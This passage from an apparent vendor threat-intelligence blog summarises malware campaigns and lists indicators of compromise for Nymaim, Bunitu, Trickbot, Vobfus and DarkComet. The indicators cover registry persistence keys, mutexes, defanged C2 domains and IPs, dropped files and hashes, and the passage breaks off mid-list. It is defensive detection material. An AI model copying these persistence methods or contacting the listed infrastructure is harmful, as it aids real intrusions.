                Description: A wave of adversaries which are dropping well-known information-stealer like Agent Tesla, Loki-bot and others since at least January 2019 using custom droppers. These droppers inject the final malware into common processes on the victim machine. Once infected, the malware can steal information from many popular pieces of software, including the Google Chrome, Safari and Firefox web browsers. The injection techniques are well-known and have been used for many years, but with the adversaries customizing them, traditional anti-virus systems are having a hard time detecting the embedded malware.
                Snort SIDs: 52246

                Title: Denial-of-service vulnerability in some Intel graphics drivers
                Description: Intel’s IGC64.dll graphics driver contains a denial-of-service vulnerability. An attacker could exploit this bug by supplying a malformed pixel shader if the graphics driver is operating inside a VMware guest operating system. This type of attack can be triggered from VMware guest usermode to cause a denial-of-service attack due to an out-of-bounds read in the driver.
                Snort SIDs: 50295, 50296

                Most prevalent malware files this week

                SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
                MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                Typical Filename: xme64-2141.exe
                Claimed Product: N/A
                Detection Name: W32.7ACF71AFA8-95.SBX.TG

                SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
                MD5: 47b97de62ae8b2b927542aa5d7f3c858
                Typical Filename: qmreportupload
                Claimed Product: qmreportupload
                Detection Name: Win.Trojan.Generic::in10.talos

                SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
                MD5: 8c80dd97c37525927c1e549cb59bcbf3
                Typical Filename: Eternalblue-2.2.0.exe
                Claimed Product: N/A
                Detection Name: W32.WNCryLdrA:Trojan.22k2.1201

                SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f 
                MD5: e2ea315d9a83e7577053f52c974f6a5a
                Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin
                Claimed Product: N/A
                Detection Name: W32.AgentWDCR:Gen.21gn.1201

                SHA 256: f917be677daab5ee91dd3e9ec3f8fd027a58371524f46dd314a13aefc78b2ddc 
                MD5: c5608e40f6f47ad84e2985804957c342
                Typical Filename: FlashHelperServices.exe
                Claimed Product: Flash Helper Service
                Detection Name: PUA:2144FlashPlayer-tpd 

                Threat Roundup for November 15 to November 22

                $
                0
                0
                Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 15 and Nov. 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
                The most prevalent threats highlighted in this roundup are:

                Threat NameTypeDescription
                Win.Downloader.Nymaim-7391562-0 Downloader Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
                Win.Trojan.Bunitu-7394346-0 Trojan Bunitu is malware that establishes a persistent foothold on an infected machine and then turns it into a proxy for criminal VPN services.
                Win.Malware.Trickbot-7394707-1 Malware Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
                Win.Worm.Vobfus-7395002-0 Worm Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its C2 server.
                Win.Malware.DarkComet-7395004-1 Malware DarkComet and related variants are a family of RATs designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
                Win.Ransomware.Cerber-7395321-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, this is no longer the case.
                Win.Dropper.Remcos-7395733-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
                Win.Dropper.Tofsee-7402230-0 Dropper Tofsee is multipurpose malware that features several modules used to carry out malicious activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.

                Threat Breakdown

                Win.Downloader.Nymaim-7391562-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\MICROSOFT\GOCFK 25
                <HKCU>\SOFTWARE\MICROSOFT\KPQL 25
                <HKCU>\SOFTWARE\MICROSOFT\GOCFK
                Value Name: mbijg
                25
                <HKCU>\SOFTWARE\MICROSOFT\KPQL
                Value Name: efp
                25
                MutexesOccurrences
                Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}25
                Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}25
                Local\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}25
                Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}25
                Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}25
                Local\{0F53A50D-AEA8-402A-580B-3C32A490301E}25
                Local\{42FDAA48-39A4-4464-9CC4-6F1A48111B12}25
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                sqmgdts[.]net25
                wneeuc[.]in25
                jiwlzenl[.]com25
                zgzaztmi[.]com25
                amkqrprvei[.]com25
                srbhfbemi[.]pw25
                yoekgdnoyej[.]in25
                scwafgfxlr[.]net25
                grnorxacnw[.]com25
                futzruakw[.]pw25
                dhcfsfxgb[.]net25
                lmgsmlhidh[.]net25
                fpmuefeozs[.]in25
                wjpbf[.]net25
                yfuoixdwjxpy[.]pw25
                sqwpuwoq[.]net25
                wqjlwcnqbe[.]com25
                tjjqmo[.]net25
                bsztb[.]in25
                gmznk[.]com25
                cejwtluei[.]com25
                rejfedtcd[.]net25
                uktldpj[.]com25
                aanpolaayjm[.]net25
                rdipde[.]com25
                *See JSON for more IOCs
                Files and or directories createdOccurrences
                %ProgramData%\ph25
                %ProgramData%\ph\eqdw.dbc25
                %ProgramData%\ph\fktiipx.ftf25
                %TEMP%\gocf.ksv25
                %TEMP%\kpqlnn.iuy25
                %TEMP%\fro.dfx24
                %TEMP%\npsosm.pan24
                \Documents and Settings\All Users\pxs\dvf.evp24
                \Documents and Settings\All Users\pxs\pil.ohu24

                File Hashes

                009c5d8c565ffc008a15040f7c1ce30a65321089606ad3e6e711e715e65ed5d3 043fd8c728078e4cc3402b65d216e224a482532faaa18dff9ce7baea068666a6 0c6cf23450cb8d2f982780d0b63b32f84c4cef5ed035b336198cfab945d7222f 0e2c7c4988f5d6b83aa46bfaec967e409310588fb31d41aaf752cd0cd1f61e07 159157544afea2dae4868b345f3ace9dbb3946dcdb051afda1f9d3de43b84b5b 27992098e220360f3a5896812a077ba611dce6936c7d8a93a8851b9498534483 2f625f48f37cc6d9ad56bf49690f578d345ca7938750614fce45a6db3ea94ee2 3b8723dccf6a910c012cba048918b741661a40bb9256356935af7dbf1c1417c4 3dccca8f309ddb9675ef1099afa48c99259af991603ffe82a83ad9516b5742f3 5c3ad5d944eb5911e73ced27779e8ecb6a555c64ace076998018e313c058c128 630b0e5f46a932762b7e569f0785e163db04a5e482a1b2c2469343439cd5f004 689c22dc80615221d5c64720f599a33eaa093e27aabcd89191fa446d5dcc8463 75d8010dab02726e712f1ba1cba34ae48d3aabf897c22caf258a552282c7cfa3 776186df1d180131e8272e9bed1901a10156c3f12adacd904b8023fe5f164b22 8837d607c0bf29f0855967de0cb3ac6e36c6418786e693dbcb92cce0addef532 8ad6d601b0d1e03dda4b01708e40fcbcc66e610c2b848f1662b26d70aa358cf6 8b75cc8eeff51a02702262472039bda60c892e0beba4f76d5b3262f1c1482081 8cb66655a63b931fd20483d5b347756980e2a5f1d70a66fb84819b1a10c82722 9c79e22684603ef09d8939a72827d9e39478e2583740f55d4a5f676a4d1cd30c a02dc770b986b1360c6534907f5c9ad368f7810da498a6df1e2bedd665db75ef a0977a0743fd97773d06407074172e2e763d5306310075b301833454204fecce a2eef697284f59a4306ad79669dcb9c1e095595cbf52a73a6775e90a34c790c4 a94e7042aea0920a02775452ec9f05ab07b7ae60a7c9466a2ce8eb8b5e40b428 aaa24779cd52e2685d6646ac379a1c102b8811f1d969e16c2d6b358d00a147ec ad3f4bd490dd4134e099d505123e528f858463a7e17989c258516c7d24ac3836
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSAThis has coverage

                Screenshots of Detection

                AMP



                Win.Trojan.Bunitu-7394346-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 26
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
                Value Name: C:\Windows\system32\rundll32.exe
                25
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY 25
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI 11
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
                Value Name: Impersonate
                11
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
                Value Name: Asynchronous
                11
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
                Value Name: MaxWait
                11
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
                Value Name: DllName
                11
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
                Value Name: Startup
                11
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: daoemni
                11
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI 9
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
                Value Name: Impersonate
                9
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
                Value Name: Asynchronous
                9
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
                Value Name: MaxWait
                9
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
                Value Name: DllName
                9
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
                Value Name: Startup
                9
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: daomni
                9
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG 5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
                Value Name: Impersonate
                5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
                Value Name: Asynchronous
                5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
                Value Name: MaxWait
                5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
                Value Name: DllName
                5
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
                Value Name: Startup
                5
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: omnilg
                5
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: syncfx
                1
                MutexesOccurrences
                qazwsxedc26
                A9ZLO3DAFRVH1WAE25
                I106865886KMTX25
                IGBIASAARMOAIZ25
                J8OSEXAZLIYSQ8J25
                LXCV0IMGIXS0RTA125
                TXA19EQZP13A6JTR25
                VSHBZL6SWAG0C25
                A9MTX7ERFAMKLQ25
                3G1S91V5ZA5fB56W1
                8AZB70HDFK0WOZIZ1
                NHO9AZB7HDK0WAZMM1
                PJOQT7WD1SAOM1
                PSHZ73VLLOAFB1
                VHO9AZB7HDK0WAZMM1
                VRK1AlIXBJDA5U3A1
                <random, matching '[A-Z0-9]{14}'>1
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                209[.]85[.]144[.]10025
                172[.]217[.]7[.]20621
                66[.]199[.]229[.]25121
                62[.]75[.]222[.]23521
                95[.]211[.]230[.]8616
                5[.]104[.]230[.]2005
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                w[.]topfealine[.]com20
                l[.]topfealine[.]com14
                w[.]netzsoflow[.]net5
                n[.]netzsoflow[.]net5
                Files and or directories createdOccurrences
                %TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt19
                %TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp19
                %LOCALAPPDATA%\daoemni.dll11
                %LOCALAPPDATA%\daomni.dll9
                %HOMEPATH%\Local Settings\Application Data\daoemni.dll9
                %HOMEPATH%\Local Settings\Application Data\daomni.dll7
                %LOCALAPPDATA%\omnilg.dll5
                %HOMEPATH%\Local Settings\Application Data\omnilg.dll5

                File Hashes

                05fc7a5cbd0145db5324d216eca44799f3089ce93b9020b1e79a8ffd074373e9 155931a83c112e3b9ec9e53170bc01f00f627149abb4df90506ff9746420ac33 1e781bec2e81a7ea35b3170ba13b8c383a5b34333bfdf5fb8c8fc2da89c79b47 21b62ce885fbb5ad9b6de7cec0bcfd9af51818e97f79b780457775515a36b3b7 22becfbe5b71e26f87a6f3525a75af422f9c6903873911290bc20f8869bd0b83 281c088b7ad0f9ed61fbdd599ffb2fdcd934a02ad66fe16b1f40c0e668d203fa 2f2e4c912ae939c550ab3d3d9723d562ceff5cd8f120570bf2ca75975d5dada1 32ea5866bda9068d8c0f10f3c50225823254194f89f841483e6dbad2e8227315 35c4024898d064cea42eebd3efe714e031aeb7a5cd685ff8fc55176762a6c5cc 371abc331dd0d9f9ae078efd7b88a60795e6707f1833f3b31675a7e80b96843f 392a1507494a62ddd1ad5f6659487254930dbba1dbcc98b3d0f34a1ab1852128 3e27faf67ebc38dc381617546201dafb570bcabc12d1d85e2088da56262d80e9 40d378b966cecafc1ba06ddfcbfb644fd408f83792e40109cd810914825d6b06 45f55ec75fdc96afb4133334435b00ea598206c9f00094a8ac42bbc37ff64310 50ab0d77e4368f929287ef0fe486712cc615f9a9c3d74f7767a257d2a677e1ae 551411d65a597560b93c303fc3fd0bde366f4fd767a940a127bc35c0e188255f 56873d0e1082711b6e9f7c0dd230fd76963f5fe977002bba0fdd51d320d2480a 57260f19a6a615eba7325d454666b2a3cf05589e4ffd20eb34c67c4493b613d2 5b144acca2679ab8563e70e789ef0026b25dcc3e2f96e651a504ef35d7cfc1ae 6243725e2486608c0266f4b954487310e8b36f092e5172eacf967a37e12c49c1 6a836249f7f7cdaa5c796248b0684f0ca45bfa524148331b8de2e395d5b0b88a 8127c67786fa6bcf2ba3b891d1619f6b2589027d94d0f8b5f10a005a1dcc4df8 8b7e399b092922ae7972799f1d28d1f40bf2c463ec2ac90d332a816c1b307cbd 9b33901eb6a246891da01fba649a7ea058c10fc5865a6610b4627fa53d3c50cb 9db359f9c8d9e4960e5fb5475c4c873b386a522ef9340153966c841e594ea224
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSA N/A

                Screenshots of Detection

                AMP




                Win.Malware.Trickbot-7394707-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                Value Name: Blob
                3
                MutexesOccurrences
                Global\316D1C7871E1026
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                117[.]196[.]233[.]10010
                94[.]156[.]144[.]745
                78[.]24[.]219[.]95
                45[.]224[.]214[.]344
                103[.]219[.]213[.]1023
                212[.]80[.]218[.]1443
                216[.]239[.]32[.]212
                62[.]109[.]22[.]22
                107[.]173[.]240[.]2212
                144[.]91[.]80[.]2532
                51[.]89[.]115[.]1102
                176[.]58[.]123[.]251
                116[.]203[.]16[.]951
                52[.]55[.]255[.]1131
                69[.]195[.]159[.]1581
                177[.]154[.]86[.]1451
                66[.]85[.]173[.]571
                5[.]182[.]210[.]2541
                117[.]255[.]221[.]1351
                185[.]222[.]202[.]251
                195[.]123[.]220[.]1551
                117[.]206[.]149[.]291
                170[.]84[.]78[.]2241
                91[.]108[.]150[.]2131
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                ident[.]me1
                myexternalip[.]com1
                ip[.]anysrc[.]net1
                ipecho[.]net1
                checkip[.]amazonaws[.]com1
                wtfismyip[.]com1
                Files and or directories createdOccurrences
                %APPDATA%\cmdcache26
                %APPDATA%\cmdcache\счв.exe26
                %System32%\Tasks\Command cache application26
                %ProgramData%\счв.exe26
                %APPDATA%\cmdcache\data26
                %APPDATA%\cmdcache\settings.ini26
                %TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt25
                %TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp25

                File Hashes

                031dba2decd40789db3851d1940275bab98d378ceb410eb661b463adf2410650 07553800c14fabbb3aca709a6d5d7af0b9936504fb3d1406825ba6034e22f97f 0d2da6104e039e429a4bb0f2a27744879a4551cbadb1e4a44de54343a6c0ac6c 218ba8f3d20fbab8eaa94aa7d3aa6ffe417d859bbf6bbd499c1e6211f0292a07 26616609c018bb2081c86a11b1567865a4ee63686eff17f4b7e88b6655ad93eb 2cd5c3baae45b92b8f39f808493a9805f94eed3847b94c853bfb160217225887 2da40b82795dff861dd4bf9025b4fd659e398d894df20ef399c1960fe92de323 334aafa1b9ac0f0d94f690a25ad5841e732de6c0609704e838e8c8ad8986a207 339c9866157b0f51d0fe6c644cd8b485672fdbf16ad5244ceaa7b4eab9d0fd56 33da9747569d5cfa3e42d8a98b8cb941829905cac809428de49e9d011372b3be 3476f50e527ab1558f8a12b20a6d0394045c98b7b352f9703499c54ac13b526a 38548798cfcc55fc8200d3f3482d9eb7eafc14feda2b88b22d143c4fec75a175 3d9bb460763687a31c360beb958abae1a5e10add4fad3b0a9e3fb70aa3803241 3e1762697fe5f1996a8cd224a97bfd47fc2578ac1950d5e177cc17edc4fa9094 4766ae5c1ffdbf142e5c7df792654f591c1ef4df1e7775484d458c2b8237312a 4793182f8a55a7d2df459ea2ef2ed27835bfe43648d78bbe540ecfe9185f4380 48f273faec8a9236fadadcd0b88cc416eab9c4c40b064742213c1e5ed24cc105 4b3ff0afe6f834a9c05354fd2089662e670e9203b864969e0d67bb957af37c43 4cfabac70d45aa70f7e129fcf234ebf84e0edb950380bacf0008616d8059601b 53677c31b06dbf686f019dad8465876ae4e757adf186d02d60a5194106ee20da 5441d28936218f078a094e4b03a60db5f06a890f02ebbbabbf2e4345ef3ed05a 5641e7f156339b3c2d624972d9eea74910e39f0620aed2eadff1fa0635137541 58d92ae7cacfadf7ca36fbabebfa721299c4a828f81707290416639919f0fb20 5953aba170deb68dde4ddd8132b51260167186cdb24a6b42d85edc28eaa49211 5b80b61034467babade5a004fab79adb3d9f18416345c1cdbe6ca0776c9c9513
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSAThis has coverage

                Screenshots of Detection

                AMP




                Win.Worm.Vobfus-7395002-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
                Value Name: ShowSuperHidden
                26
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU 26
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU
                Value Name: NoAutoUpdate
                26
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 26
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: ciiti
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: supej
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: zauuca
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: yxyom
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: wznoid
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: qousu
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: jiigio
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: bmjiif
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: ryhiy
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: caodaap
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: viean
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: beoal
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: fiiisep
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: fuafoop
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: juuso
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: peaceit
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: mbnur
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: zoelie
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: teuemar
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: jomol
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: yiozaot
                1
                MutexesOccurrences
                A26
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                204[.]11[.]56[.]4826
                46[.]166[.]182[.]11513
                37[.]48[.]65[.]14811
                64[.]32[.]8[.]677
                207[.]244[.]67[.]214/314
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                ns1[.]anytime2[.]net26
                ns1[.]anytime3[.]net26
                ns1[.]anytime3[.]org26
                ns1[.]anytime2[.]com26
                ns1[.]anytime4[.]com26
                ns1[.]anytime2[.]org26
                ns1[.]anytime1[.]net26
                ns1[.]anytime1[.]org26
                ns1[.]anytime1[.]com26
                Files and or directories createdOccurrences
                \autorun.inf26
                \System Volume Information.exe26
                \$RECYCLE.BIN.exe26
                \Secret.exe26
                \Passwords.exe26
                \Porn.exe26
                \Sexy.exe26
                E:\autorun.inf26
                E:\$RECYCLE.BIN.exe26
                E:\Passwords.exe26
                E:\Porn.exe26
                E:\Secret.exe26
                E:\Sexy.exe26
                E:\System Volume Information.exe26
                E:\x.mpeg26
                %HOMEPATH%26
                %HOMEPATH%\Passwords.exe26
                %HOMEPATH%\Porn.exe26
                %HOMEPATH%\Secret.exe26
                %HOMEPATH%\Sexy.exe26
                %HOMEPATH%\c26
                %HOMEPATH%\c\Passwords.exe26
                %HOMEPATH%\c\Porn.exe26
                %HOMEPATH%\c\Secret.exe26
                %HOMEPATH%\c\Sexy.exe26
                *See JSON for more IOCs

                File Hashes

                0114132de55fe3391d2ffe1eb2235af64538e704a5d39a7c12a5242b26feff60 024c44316844dd33ee87876a1acf6b823b30f97b8f9b2aa593289df21b0ec1d7 056bf3cca6f0cd4e41ad01e0eb4700bee0271c2bb3334642784920529e2554de 07ee7ffcf647257d1293ad9826c82fc09398f657092c25b21169f87fa5a7c9d4 08169078f447a9671714276fd75f906cd349fb720001a77d78bef56b9e35a233 081aabf461e76026a4b5ce622d7dea97bd5c69bd7f6291bc69325ee9e1b2478b 082ee719168ea7be341b1303d4e62fe30007af27470e269a63aa0b1098e7d488 084b2c416ebeb7c01a099604458bc0851f1e1e8b2f230522898cf4084c803f15 0a1e200b0c26beab5775cfa61c2639ea27157e46781e70cbd78a4b19232b632b 0ad7fb766799dd2f438ba70821e2c7f6b2e08c524fd750b34a6209ab8ac3d480 0b11ae767b606de45c93913ce84153b226eae42d035871a9955f19c4cbb46c7a 0bf91f7b0d81a825f042006243db69eb23d52726c19b335ad42e188c53616d99 0c5f7e0d447a0f9445888ba803a9c6bb223bdee7d982be2f833d6184e754b7b0 0e323827671fd25c7f89c594618623916a4dc60221f405a3f2bf7df0275e4e0d 0eb69de315990b07cdc4e6472f7b1a178412d9730766fddb596bddf5b2576ed1 1396cae157a806641cb34122f34c22b4dc995028686f6a082725e4e335e60aed 13a7e9c873e5e108d28acca607b1689f391c1036db6d977f8602908046ca4739 148a31211653eb50a050446b5556cf02846f957e210725c56cde63b8196384e5 156452ee7c520ac7ef66233c06b2d9bb8faa3c119e9ae697a53695a7f10c3fa3 15b5879a31b9e41872a13caefbff2bc7e4b672beb19a6fbc3c5b5a38774cc13d 16fa24d44c523e35c4c37fc149647d7e6c21d090a047127fc8d68fc6b9ad8a42 1713907f8ca3dc61f966a367d1d65a4dc13e525fc8ce091b2147d3665a3c0c23 193491d849129d8286edd480622bbe6da83f551d6cd8d3eb16c3cc38c21eeacb 1a59da8f0388e798d4ade89f7c880166b72ad576cc87a883568d614df2d0529d 1b1de63ef24f88d5350acd0909ed76b0ee71c7fa327a715bb1ae554feb33837b
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSAThis has coverage

                Screenshots of Detection

                AMP




                Win.Malware.DarkComet-7395004-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\DC3_FEXEC 13
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
                Value Name: UserInit
                12
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Driver
                7
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: RealtekHD
                3
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: MicroUpdate
                2
                MutexesOccurrences
                DC_MUTEX-RL28VNV3
                DCMUTEX1
                DC_MUTEX-JG8JLJL1
                DC_MUTEX-M79BVMN1
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                lolmands[.]chickenkiller[.]com4
                Files and or directories createdOccurrences
                %APPDATA%\MSDCSC7
                %APPDATA%\MSDCSC\driver7
                %APPDATA%\dclogs4
                %ProgramData%\Microsoft\Windows\Start Menu\MSDCSC3
                %ProgramData%\Microsoft\Windows\Start Menu\MSDCSC\RealtekHD.exe3
                \Documents and Settings\All Users\Start Menu\MSDCSC\RealtekHD.exe3
